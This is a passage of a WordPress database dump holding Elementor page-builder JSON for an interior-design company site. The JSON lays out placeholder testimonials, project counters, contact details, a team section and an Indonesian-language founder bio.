customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9c560b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"63f0bcf\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"9b446cc\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"94218cd\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"9ac0b32\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"f80af3e\"}],\"background_item_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"-15\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"bounceInUp\",\"_animation_tablet\":\"none\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"dot_control\":\"yes\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5079813\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-contact-with-us.jpg\",\"id\":2653,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"background_overlay_background\":\"classic\",\"background_overlay_color\":\"#242424\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.8,\"sizes\":[]},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"170\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"4971895\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":30},\"elements\":[{\"id\":\"22aaaa7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Challenges in deploying\\ninterior design applications\",\"align\":\"center\",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"800\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"16\",\"bottom\":\"0\",\"left\":\"16\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"7\",\"bottom\":\"0\",\"left\":\"7\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_element_custom_width\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"typography_font_size_mobile\":{\"unit\":\"px\",\"size\":42,\"sizes\":[]},\"typography_line_height\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fe7bd92\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"\",\"library\":\"\"},\"label\":\"Get your quote or call: \",\"items_info\":[{\"type\":\"phone\",\"email_label\":\"email@company.com\",\"email_address\":\"email@company.com\",\"_id\":\"6dcb687\",\"phone_label\":\"0822 9777 5589\",\"phone_address\":\"082297775589\"}],\"alignment\":\"center\",\"label_color\":\"#FFFFFF\",\"label_typography_typography\":\"custom\",\"label_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"label_typography_font_weight\":\"700\",\"label_margin\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display\":\"inline-flex\",\"info_typography_typography\":\"custom\",\"info_typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"info_typography_font_weight\":\"700\",\"info_color\":\"#E3B25A\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"contact_label_display_mobile\":\"inline-block\",\"alignment_mobile\":\"center\",\"info_item_alignment_mobile\":\"center\"},\"elements\":[],\"widgetType\":\"retirio_elementor_contact_info\"},{\"id\":\"1dbd858\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact with us\",\"background_color\":\"#FFFFFF\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"38\",\"bottom\":\"18\",\"left\":\"38\",\"isLinked\":false},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"typography_line_height\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"typography_line_height_tablet\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"typography_line_height_mobile\":{\"unit\":\"px\",\"size\":\"\",\"sizes\":[]},\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"button_text_color\":\"#2D2D2D\",\"hover_color\":\"#FFFFFF\",\"button_bg_hover\":\"#E3B25A\",\"_animation\":\"none\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a9e80df\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-66\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"c5b31d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"1ecd2ea\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"40\",\"box_shadow_box_shadow_type\":\"yes\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":10,\"blur\":10,\"spread\":0,\"color\":\"rgba(0, 0, 0, 0.1)\"},\"padding\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"50\",\"bottom\":\"40\",\"left\":\"50\",\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#FFFFFF\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-110\",\"left\":0,\"isLinked\":false},\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-couter.png\",\"id\":3570,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"%\",\"size\":-290,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":120,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":53,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":71,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"30\",\"bottom\":\"40\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[{\"id\":\"617f43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ac2aeba\",\"elType\":\"widget\",\"settings\":{\"title\":\"Project Completed\",\"icon\":{\"value\":\"flaticon flaticon-architect-1\",\"library\":\"flaticon\"},\"number\":6800},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"431e0f1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"da1e266\",\"elType\":\"widget\",\"settings\":{\"title\":\"Architectures\",\"number\":906,\"icon\":{\"value\":\"flaticon flaticon-architect\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"5255259\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"083da50\",\"elType\":\"widget\",\"settings\":{\"title\":\"Service providing\",\"number\":200,\"icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true},{\"id\":\"944a539\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"_inline_size_tablet\":50},\"elements\":[{\"id\":\"d0e2ce9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Happy customers\",\"number\":9760,\"icon\":{\"value\":\"flaticon flaticon-satisfaction\",\"library\":\"flaticon\"}},\"elements\":[],\"widgetType\":\"retirio_elementor_counter\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4388608\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"100\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b6b9eaa\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5a2ebcc\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our Architects\",\"title\":\"Our expert team\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"9d2f9e3\",\"elType\":\"widget\",\"settings\":{\"info_background_background\":\"classic\",\"info_background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-lines-team.png\",\"id\":937,\"alt\":\"\",\"source\":\"library\"},\"info_background_position\":\"top right\",\"info_background_repeat\":\"no-repeat\",\"total_count\":6,\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"ova_team\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7836724\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b90ed21\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"b88a577\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01.png\",\"id\":752,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ad43d0d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"_inline_size_mobile\":100,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"35d31c6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02.png\",\"id\":753,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0eaabe3\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4c51b79\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03.png\",\"id\":754,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ee06889\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"02c4aae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04.png\",\"id\":755,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c6b5264\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"c3c96cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05.jpg.png\",\"id\":757,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6720e69\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"77fc613\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06.png\",\"id\":756,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(3915,4877,'_elementor_page_assets','a:1:{s:6:\"styles\";a:4:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";}}'),(3916,4877,'_elementor_pro_version','3.8.1'),(3917,4878,'_wp_page_template','elementor_header_footer'),(3918,4878,'_elementor_edit_mode','builder'),(3919,4878,'_elementor_template_type','wp-page'),(3920,4878,'_elementor_version','3.8.1'),(3921,4878,'_elementor_data','[{\"id\":\"013ca3e\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-section-1.png\",\"id\":3589,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center right\",\"background_repeat\":\"no-repeat\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false},\"background_position_tablet\":\"top right\",\"background_size\":\"auto\",\"gap\":\"no\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"b6a844e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50.684,\"_inline_size_tablet\":100,\"align\":\"flex-end\",\"align_tablet\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"100\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-right\",\"animation_tablet\":\"none\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"56708b8\",\"elType\":\"widget\",\"settings\":{\"template\":\"template_2\",\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/about-get-to-know-us.jpg\",\"id\":710,\"alt\":\"\",\"source\":\"library\"},\"show_line_left\":\"yes\",\"text_left\":\"Architect\",\"text_left_margin\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"image_width_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_height_mobile\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"line_width_left_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"1829eb5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":49.316,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-move-left\",\"animation_tablet\":\"none\"},\"elements\":[{\"id\":\"2733af6\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"\",\"title\":\"John Alan\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"13\",\"left\":\"0\",\"isLinked\":false},\"content_typography_title_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"dcb995a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Pengusaha di bidang kontraktor, konsultan interior design, property developer, hotel dan F&amp;B yang telah berpengalaman sejak tahun 2005.<\\/p><p>Selain sebagai pengusaha, John Alan juga merupakan business coach yang aktif dalam mengembangkan komunitas wirausaha dan telah berkolaborasi dengan para pakar di berbagai industri.<\\/p><p>maupun tempat kerja agar selain nyaman juga mewakili kepribadian penghuninya.<\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"60\",\"bottom\":\"7\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2eb768f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Konsultasi perencanaan & interior design\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"ced22e0\"},{\"text\":\"Penyusunan Rencana Anggaran Belanja\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"e6ab069\"},{\"text\":\"Produksi furniture dan pekerjaan sipil\",\"selected_icon\":{\"value\":\"fas fa-arrow-circle-right\",\"library\":\"fa-solid\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#242424\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"bold\",\"space_between\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"space_between_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.4,\"sizes\":[]},\"icon_typography_line_height_tablet\":{\"unit\":\"em\",\"size\":1.2,\"sizes\":[]},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"f3caa1a\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\"},\"elements\":[{\"id\":\"697046f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20},\"elements\":[{\"id\":\"4b2c591\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/09\\/john_allan.jpg\",\"id\":4839,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"image_border_width\":{\"unit\":\"px\",\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true},\"_element_width\":\"auto\",\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true},\"_border_color\":\"#E3B25A\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"15\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":true},{\"id\":\"9b875c0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":79.92,\"space_between_widgets\":10},\"elements\":[{\"id\":\"1150f91\",\"elType\":\"widget\",\"settings\":{\"title\":\"John Alan\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]},\"header_size\":\"h3\",\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":3,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"23ae2ff\",\"elType\":\"widget\",\"settings\":{\"editor\":\"CO - FOUNDER\",\"align\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e8e90de\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5b19198\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"d460dea\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking about BauHaus\",\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"15\",\"bottom\":\"0\",\"left\":\"15\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"da0b416\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"11f956f\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"d232423\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#E3B25A\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"8056628\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/avatar.jpg\",\"id\":718,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#242424\",\"_id\":\"51a9c88\"}],\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure 